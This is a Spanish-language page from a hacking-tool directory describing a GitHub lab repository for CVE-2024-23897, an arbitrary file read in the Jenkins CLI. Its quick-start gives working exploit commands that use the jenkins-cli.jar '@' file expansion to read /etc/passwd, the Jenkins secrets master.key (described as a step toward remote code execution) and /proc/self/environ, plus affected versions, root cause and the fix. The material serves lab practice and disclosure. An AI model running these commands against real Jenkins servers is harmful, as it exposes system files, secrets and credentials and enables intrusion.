Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-23897 | Kitploit
Herramientas/GitHubGitHub/dungsocool/cve-2024-23897
Escáneres de VulnerabilidadesExplotaciónSeguridad WebAprendizaje y EducaciónLabs y Práctica
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-23897 — Jenkins CLI Lectura Arbitraria de Archivos

Inicio rápido

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Detalles

Consulte REPORT.md para el análisis técnico completo (vietnamita).

ElementoValor
CVSS9.8 (Crítico)
AfectadosJenkins <= 2.441, LTS <= 2.426.2
Versión del laboratoriojenkins/jenkins:2.426.2-lts
Causa raízargs4j expandAtFiles habilitado en la CLI del lado del servidor
SoluciónActualice a Jenkins >= 2.442 / LTS >= 2.426.3

Limpieza

root@kitploit:~
docker-compose down -v --remove-orphans
Descargar herramienta